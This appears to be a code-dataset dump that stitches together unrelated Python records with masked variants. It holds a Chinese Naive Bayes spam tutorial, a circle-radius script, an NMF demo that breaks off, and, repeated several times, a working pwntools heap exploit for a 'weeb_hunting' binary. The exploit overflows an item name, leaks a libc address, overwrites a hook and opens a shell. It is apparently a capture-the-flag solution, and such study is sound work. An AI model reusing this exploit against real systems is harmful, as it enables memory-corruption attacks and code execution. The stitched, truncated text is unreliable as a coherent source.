而剩余部分作为测试集的过程称为留存交叉验证(hold-out crossvalidation) 。 假定现在只完成了一次迭代, 那么为了更精确地估计分类\n器的错误率, 就应该进行多次迭代后求出平均错误率。接下来的for循环遍历训练集的所有文档, 对每封邮件基于词汇表并使\n用setOfWords2Vec()函数来构建词向量。 这些词在traindNB0()函数中用于计算分类所需的概率。 然后遍历测试集, 对其中每封电子邮件进\n行分类❸。 如果邮件分类错误, 则错误数加1, 最后给出总的错误百分比\n\"\"\"\ndef spamTest():\n docList=[]; classList = []; fullText =[]\n for i in range(1,26):\n wordList = textParse(open('email/spam/%d.txt' % i).read())\n docList.append(wordList)\n fullText.extend(wordList)\n classList.append(1)\n wordList = textParse(open('email/ham/%d.txt' % i).read())\n docList.append(wordList)\n fullText.extend(wordList)\n classList.append(0)\n vocabList = createVocabList(docList)# create vocabulary\n trainingSet = range(50); testSet=[] # create test set\n # (以下四行) 随机构建训练集\n for i in range(10):\n randIndex = int(random.uniform(0,len(trainingSet)))\n testSet.append(trainingSet[randIndex])\n # todo del这个操作步骤\n del(trainingSet[randIndex]) \n trainMat=[]; trainClasses = []\n # (以下四行) 对测试集分类\n for docIndex in trainingSet:#train the classifier (get probs) trainNB0\n trainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))\n trainClasses.append(classList[docIndex])\n # todo 入参出参的计算方法\n p0V,p1V,pSpam = trainNB0(array(trainMat),array(trainClasses))\n errorCount = 0\n for docIndex in testSet: #classify the remaining items\n wordVector = bagOfWords2VecMN(vocabList, docList[docIndex])\n if classifyNB(array(wordVector),p0V,p1V,pSpam) != classList[docIndex]:\n errorCount += 1\n print (\"classification error\",docList[docIndex])\n print ('the error rate is: ',float(errorCount)/len(testSet))\n #return vocabList,fullText\n\n# ------------------------自动化处理----------------------------------------\nspamTest()\n\n# ----------------------------- 4.7. 
示例: 使用朴素贝叶斯分类器从个人广告中获取区域倾向---------------------------\n\n\"\"\"\"\nRSS源分类器及高频词去除函数\n函数calcMostFreq() ❶。 该函数遍历词汇表中的每个词并统计它在文本中出现的次数, 然后根据出现次数从高到低对词典进行排序,\n最后返回排序最高的30个单词。 你很快就会明白这个函数的重要性\n以下四行) 计算出现频率\n\"\"\"\ndef calcMostFreq(vocabList,fullText):\n import operator\n freqDict = {}\n for token in vocabList:\n freqDict[token]=fullText.count(token)\n sortedFreq = sorted(freqDict.iteritems(), key=operator.itemgetter(1), reverse=True) \n return sortedFreq[:30] \n\n\"\"\"\"\n函数localWords()使用两个RSS源作为参数。 RSS源要在函数外\n导入, 这样做的原因是RSS源会随时间而改变。 如果想通过改变代码来\n比较程序执行的差异, 就应该使用相同的输入。 重新加载RSS源就会得\n到新的数据, 但很难确定是代码原因还是输入原因导致输出结果的改\n变。 函数localWords()与程序清单4-5中的spamTest()函数几乎相\n同, 区别在于这里访问的是RSS源❷而不是文件。 然后调用函\n数calcMostFreq()来获得排序最高的30个单词并随后将它们移除❸。\n函数的剩余部分与spamTest()基本类似, 不同的是最后一行要返回下\n面要用到的值。\n\"\"\"\ndef localWords(feed1,feed0):\n import feedparser\n docList=[]; classList = []; fullText =[]\n minLen = min(len(feed1['entries']),len(feed0['entries']))\n for i in range(minLen):\n # 2 每次访问一条RSS源\n wordList = textParse(feed1['entries'][i]['summary'])\n docList.append(wordList)\n fullText.extend(wordList)\n classList.append(1) #NY is class 1\n wordList = textParse(feed0['entries'][i]['summary'])\n docList.append(wordList)\n fullText.extend(wordList)\n classList.append(0)\n # (以下四行) 去掉出现次数最高的那些词\n vocabList = createVocabList(docList)#create vocabulary\n top30Words = calcMostFreq(vocabList,fullText) #remove top 30 words\n for pairW in top30Words:\n if pairW[0] in vocabList: vocabList.remove(pairW[0])\n trainingSet = range(2*minLen); testSet=[] #create test set\n for i in range(20):\n randIndex = int(random.uniform(0,len(trainingSet)))\n testSet.append(trainingSet[randIndex])\n del(trainingSet[randIndex]) \n trainMat=[]; trainClasses = []\n for docIndex in trainingSet:#train the classifier (get probs) trainNB0\n trainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))\n trainClasses.append(classList[docIndex])\n p0V,p1V,pSpam = trainNB0(array(trainMat),array(trainClasses))\n errorCount = 
0\n for docIndex in testSet: #classify the remaining items\n wordVector = bagOfWords2VecMN(vocabList, docList[docIndex])\n if classifyNB(array(wordVector),p0V,p1V,pSpam) != classList[docIndex]:\n errorCount += 1\n print ('the error rate is: ',float(errorCount)/len(testSet))\n return vocabList,p0V,p1V\n\ndef getTopWords(ny,sf):\n import operator\n vocabList,p0V,p1V=localWords(ny,sf)\n topNY=[]; topSF=[]\n for i in range(len(p0V)):\n if p0V[i] > -6.0 : topSF.append((vocabList[i],p0V[i]))\n if p1V[i] > -6.0 : topNY.append((vocabList[i],p1V[i]))\n sortedSF = sorted(topSF, key=lambda pair: pair[1], reverse=True)\n print (\"SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**\")\n for item in sortedSF:\n print (item[0])\n sortedNY = sorted(topNY, key=lambda pair: pair[1], reverse=True)\n print (\"NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**\")\n for item in sortedNY:\n print (item[0])\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python3
import sys
import csv
import math
import collections
import argparse
import fileinput
import lp
parser = argparse.ArgumentParser(description="Takes an input of *.lp format and sets all radii to the same value")
parser.add_argument("inputfile", help="if specified reads a *.lp formatted file otherwise standard in")

# Radius assigned to every circle in the input.
R = 1

def main():
    """Read *.lp rows (skipping '#' comment lines), force every radius to R, and print."""
    reader = csv.reader(row for row in fileinput.input() if not row.startswith('#'))
    # The module is imported as `lp` (see the imports above); the original
    # `lps.parse_lps(...)` referenced an undefined name and raised NameError.
    circles = lp.parse_lps(reader)
    for circle in circles:
        circle.r = R
        print(circle)

if __name__ == "__main__":
    main()
|
normal
|
{
"blob_id": "00f62fec7f5372c5798b0ebf3f3783233360581e",
"index": 2987,
"step-1": "<mask token>\n\n\ndef main():\n reader = csv.reader(row for row in fileinput.input() if not row.\n startswith('#'))\n circles = lps.parse_lps(reader)\n for circle in circles:\n circle.r = R\n print(circle)\n\n\n<mask token>\n",
"step-2": "<mask token>\nparser.add_argument('inputfile', help=\n 'if specified reads a *.lp formatted file otherwise standard in')\n<mask token>\n\n\ndef main():\n reader = csv.reader(row for row in fileinput.input() if not row.\n startswith('#'))\n circles = lps.parse_lps(reader)\n for circle in circles:\n circle.r = R\n print(circle)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nparser = argparse.ArgumentParser(description=\n 'Takes an input of *.lp format and sets all radii to the same value')\nparser.add_argument('inputfile', help=\n 'if specified reads a *.lp formatted file otherwise standard in')\nR = 1\n\n\ndef main():\n reader = csv.reader(row for row in fileinput.input() if not row.\n startswith('#'))\n circles = lps.parse_lps(reader)\n for circle in circles:\n circle.r = R\n print(circle)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\nimport csv\nimport math\nimport collections\nimport argparse\nimport fileinput\nimport lp\nparser = argparse.ArgumentParser(description=\n 'Takes an input of *.lp format and sets all radii to the same value')\nparser.add_argument('inputfile', help=\n 'if specified reads a *.lp formatted file otherwise standard in')\nR = 1\n\n\ndef main():\n reader = csv.reader(row for row in fileinput.input() if not row.\n startswith('#'))\n circles = lps.parse_lps(reader)\n for circle in circles:\n circle.r = R\n print(circle)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python3\nimport sys\nimport csv\nimport math\n\nimport collections\nimport argparse\nimport fileinput\n\nimport lp\n\nparser = argparse.ArgumentParser(description=\"Takes an input of *.lp format and sets all radii to the same value\")\nparser.add_argument(\"inputfile\", help=\"if specified reads a *.lp formatted file otherwise standard in\")\n\nR = 1\n\ndef main():\n reader = csv.reader(row for row in fileinput.input() if not row.startswith('#'))\n\n circles = lps.parse_lps(reader)\n\n for circle in circles:\n circle.r = R\n print(circle)\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
pwnlib.gdb.attach(p)
<|reserved_special_token_0|>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
<|reserved_special_token_0|>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
<|reserved_special_token_0|>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('\n')
<|reserved_special_token_0|>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('\n')
p.send('\n')
<|reserved_special_token_0|>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('1')
<|reserved_special_token_0|>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
<|reserved_special_token_0|>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('A"`')
<|reserved_special_token_0|>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
<|reserved_special_token_0|>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
<|reserved_special_token_0|>
while 'You found a sword' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')
<|reserved_special_token_0|>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
<|reserved_special_token_0|>
log.info(hex(__srandom))
<|reserved_special_token_0|>
log.info('Fake chunk: ' + hex(hook))
p.sendline('2')
<|reserved_special_token_0|>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
<|reserved_special_token_0|>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
<|reserved_special_token_0|>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
<|reserved_special_token_0|>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
p = process('./weeb_hunting')
elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
pwnlib.gdb.attach(p)
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('\n')
p.send('\n')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('1')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('A"`')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a sword' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
__srandom = u64((r.split('1. ')[1].split('\n')[0] + '\x00' * 8)[:8])
log.info(hex(__srandom))
hook = __srandom + 3711517
log.info('Fake chunk: ' + hex(hook))
p.sendline('2')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
<|reserved_special_token_1|>
# Interactive pwntools exploit for the './weeb_hunting' binary (glibc 2.23).
# The script plays through a menu-driven game, leaks a libc pointer from an
# inventory listing, derives a write target from the leak, and overwrites it
# to get a shell. All recv/send sequencing below is specific to the target
# binary's prompts; do not reorder.
from pwn import *
p = process('./weeb_hunting')
elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
pwnlib.gdb.attach(p)
# Phase 1: answer prompts ('>' menus) until an item drop ("You found a")
# appears; four rounds of this fill the early game state.
r = p.recv()
while 'You found a' not in r:
    r = p.recvuntil('>')
    p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
    r = p.recvuntil('>')
    p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
    r = p.recvuntil('>')
    p.send('AAAA\n')
p.send('\n')
r = p.recv()
while 'You found a' not in r:
    r = p.recvuntil('>')
    p.send('\n')
p.send('\n')
# Phase 2: navigate to the inventory menu (recognized by its "10. empty"
# slot) and select items 1 and 4.
r = p.recv()
while '10. empty' not in r:
    p.send('\n')
    r = p.recv()
p.sendline('1')
r = p.recv()
while '10. empty' not in r:
    p.send('\n')
    r = p.recv()
p.sendline('4')
# Phase 3: feed crafted names on subsequent drops. 'A"`' embeds the raw
# bytes 41 22 60 — presumably grooming heap metadata; TODO confirm against
# the binary.
r = p.recv()
while 'You found a' not in r:
    p.send('\n')
    r = p.recv()
p.sendline('A"`')
r = p.recv()
while 'You found a' not in r:
    p.send('\n')
    r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a' not in r:
    p.send('\n')
    r = p.recv()
p.sendline('AAAA')
# Phase 4: on the sword drop, send an oversized 50-byte name ending in
# '` `' — looks like an overflow into adjacent heap data; verify lengths
# against the binary's buffer size.
r = p.recv()
while 'You found a sword' not in r:
    p.send('\n')
    r = p.recv()
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')
# Phase 5: the corrupted inventory now prints a libc address in slot 1;
# parse it (pad to 8 bytes for u64). The variable name suggests the leak
# is &srandom, and hook = leak + 0x38A21D (3711517) is the write target —
# presumably a libc hook for this glibc build; TODO confirm the offset.
r = p.recv()
while '10. empty' not in r:
    p.send('\n')
    r = p.recv()
__srandom = u64((r.split('1. ')[1].split('\n')[0] + '\x00' * 8)[:8])
log.info(hex(__srandom))
hook = __srandom + 3711517
log.info('Fake chunk: ' + hex(hook))
# Phase 6: a sequence of menu selections (2, 3, 4, 3) between inventory
# screens — presumably free/alloc steps setting up the overwrite.
p.sendline('2')
r = p.recv()
while '10. empty' not in r:
    p.send('\n')
    r = p.recv()
p.sendline('3')
r = p.recv()
while '10. empty' not in r:
    p.send('\n')
    r = p.recv()
p.sendline('4')
r = p.recv()
while '10. empty' not in r:
    p.send('\n')
    r = p.recv()
p.sendline('3')
# Phase 7: on the next drop, send the 6 low bytes of the target address,
# then hand the tube to the user (shell expected on success).
r = p.recv()
while 'You found a' not in r:
    p.send('\n')
    r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
<|reserved_special_token_1|>
from pwn import *
p = process("./weeb_hunting")
elf = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
pwnlib.gdb.attach(p)
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("AAAA\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("AAAA\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("\n")
p.send("\n")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("1")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("4")
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('\x41\x22\x60')
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while "You found a sword" not in r:
p.send("\n")
r = p.recv()
p.sendline("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
__srandom = u64((r.split("1. ")[1].split("\n")[0] + "\x00"*8)[:8])
log.info(hex(__srandom))
hook = __srandom + 0x38A21D
log.info("Fake chunk: " + hex(hook))
p.sendline("2")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("3")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("4")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("3")
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
|
flexible
|
{
"blob_id": "5eb4c71869b077dac0d61072c99d801030395fc2",
"index": 636,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npwnlib.gdb.attach(p)\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('\\n')\n<mask token>\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('\\n')\np.send('\\n')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('1')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('A\"`')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\n<mask token>\nwhile 'You found a sword' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\n<mask token>\nlog.info(hex(__srandom))\n<mask token>\nlog.info('Fake chunk: ' + hex(hook))\np.sendline('2')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\n<mask token>\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\n<mask token>\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline(p64(hook)[:6])\np.interactive()\n",
"step-3": "<mask token>\np = process('./weeb_hunting')\nelf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')\npwnlib.gdb.attach(p)\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('\\n')\np.send('\\n')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('1')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('A\"`')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a sword' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\n__srandom = u64((r.split('1. ')[1].split('\\n')[0] + '\\x00' * 8)[:8])\nlog.info(hex(__srandom))\nhook = __srandom + 3711517\nlog.info('Fake chunk: ' + hex(hook))\np.sendline('2')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline(p64(hook)[:6])\np.interactive()\n",
"step-4": "from pwn import *\np = process('./weeb_hunting')\nelf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')\npwnlib.gdb.attach(p)\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('AAAA\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('AAAA\\n')\np.send('\\n')\nr = p.recv()\nwhile 'You found a' not in r:\n r = p.recvuntil('>')\n p.send('\\n')\np.send('\\n')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('1')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('A\"`')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAA')\nr = p.recv()\nwhile 'You found a sword' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\n__srandom = u64((r.split('1. ')[1].split('\\n')[0] + '\\x00' * 8)[:8])\nlog.info(hex(__srandom))\nhook = __srandom + 3711517\nlog.info('Fake chunk: ' + hex(hook))\np.sendline('2')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('4')\nr = p.recv()\nwhile '10. empty' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline('3')\nr = p.recv()\nwhile 'You found a' not in r:\n p.send('\\n')\n r = p.recv()\np.sendline(p64(hook)[:6])\np.interactive()\n",
"step-5": "from pwn import *\n\np = process(\"./weeb_hunting\")\n\nelf = ELF(\"/lib/x86_64-linux-gnu/libc-2.23.so\")\n\npwnlib.gdb.attach(p)\n\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"AAAA\\n\")\np.send(\"AAAA\\n\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"AAAA\\n\")\np.send(\"AAAA\\n\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"AAAA\\n\")\np.send(\"\\n\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tr = p.recvuntil(\">\")\n\tp.send(\"\\n\")\np.send(\"\\n\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"1\")\n\nr = p.recv()\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"4\")\n\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline('\\x41\\x22\\x60')\n\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline('AAAA')\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline('AAAA')\n\nr = p.recv()\nwhile \"You found a sword\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `\")\n\nr = p.recv()\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\n__srandom = u64((r.split(\"1. \")[1].split(\"\\n\")[0] + \"\\x00\"*8)[:8])\nlog.info(hex(__srandom))\n\nhook = __srandom + 0x38A21D\n\nlog.info(\"Fake chunk: \" + hex(hook))\n\np.sendline(\"2\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"3\")\nr = p.recv()\n\nwhile \"10. empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"4\")\nr = p.recv()\n\nwhile \"10. 
empty\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(\"3\")\nr = p.recv()\nwhile \"You found a\" not in r:\n\tp.send(\"\\n\")\n\tr = p.recv()\n\np.sendline(p64(hook)[:6])\n\np.interactive()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def generateComponent(m):
"""Creates oscillating components to be mixed"""
freq = 25 * np.random.random()
phase = 2 * np.pi * np.random.random()
x = np.arange(m)
return np.cos(x / freq - phase) ** 2
<|reserved_special_token_0|>
def add_noise(Y, sigma):
"""Adds noise to Y"""
return Y + np.random.normal(0, sigma, Y.shape)
def match(A, S, trueS):
"""Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)"""
cov = np.cov(trueS, S)
k = S.shape[0]
corr = np.zeros([k, k])
for i in range(k):
for j in range(k):
corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])
arrangement = linear_sum_assignment(-corr)
resS = np.zeros_like(S)
resAT = np.zeros_like(A.T)
for t in range(k):
resS[arrangement[1][t]] = S[arrangement[0][t]]
resAT[arrangement[1][t]] = A.T[arrangement[0][t]]
return resAT.T, resS
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def generateComponent(m):
"""Creates oscillating components to be mixed"""
freq = 25 * np.random.random()
phase = 2 * np.pi * np.random.random()
x = np.arange(m)
return np.cos(x / freq - phase) ** 2
def generateAmplitudes(k):
"""Makes mixing coefficients"""
res = np.array([np.random.random() for i in range(k)])
return res / res.sum()
def add_noise(Y, sigma):
"""Adds noise to Y"""
return Y + np.random.normal(0, sigma, Y.shape)
def match(A, S, trueS):
"""Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)"""
cov = np.cov(trueS, S)
k = S.shape[0]
corr = np.zeros([k, k])
for i in range(k):
for j in range(k):
corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])
arrangement = linear_sum_assignment(-corr)
resS = np.zeros_like(S)
resAT = np.zeros_like(A.T)
for t in range(k):
resS[arrangement[1][t]] = S[arrangement[0][t]]
resAT[arrangement[1][t]] = A.T[arrangement[0][t]]
return resAT.T, resS
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logging.basicConfig()
logger = logging.getLogger('proxmin')
logger.setLevel(logging.INFO)
def generateComponent(m):
"""Creates oscillating components to be mixed"""
freq = 25 * np.random.random()
phase = 2 * np.pi * np.random.random()
x = np.arange(m)
return np.cos(x / freq - phase) ** 2
def generateAmplitudes(k):
"""Makes mixing coefficients"""
res = np.array([np.random.random() for i in range(k)])
return res / res.sum()
def add_noise(Y, sigma):
"""Adds noise to Y"""
return Y + np.random.normal(0, sigma, Y.shape)
def match(A, S, trueS):
"""Rearranges columns of S to best fit the components they likely represent (maximizes sum of correlations)"""
cov = np.cov(trueS, S)
k = S.shape[0]
corr = np.zeros([k, k])
for i in range(k):
for j in range(k):
corr[i][j] = cov[i + k][j] / np.sqrt(cov[i + k][i + k] * cov[j][j])
arrangement = linear_sum_assignment(-corr)
resS = np.zeros_like(S)
resAT = np.zeros_like(A.T)
for t in range(k):
resS[arrangement[1][t]] = S[arrangement[0][t]]
resAT[arrangement[1][t]] = A.T[arrangement[0][t]]
return resAT.T, resS
if __name__ == '__main__':
n = 50
k = 3
b = 100
noise = 0.02
np.random.seed(101)
trueA = np.array([generateAmplitudes(k) for i in range(b)])
trueS = np.array([generateComponent(n) for i in range(k)])
trueY = np.dot(trueA, trueS)
Y = add_noise(trueY, noise)
W = None
A = np.array([generateAmplitudes(k) for i in range(b)])
S = np.array([generateComponent(n) for i in range(k)])
p1 = partial(po.prox_unity_plus, axis=1)
proxs_g = [[p1], None]
tr = Traceback(2)
nmf(Y, A, S, W=W, prox_A=p1, e_rel=1e-06, e_abs=1e-06 / noise ** 2,
traceback=tr)
A, S = match(A, S, trueS)
fig = plt.figure(figsize=(6, 7))
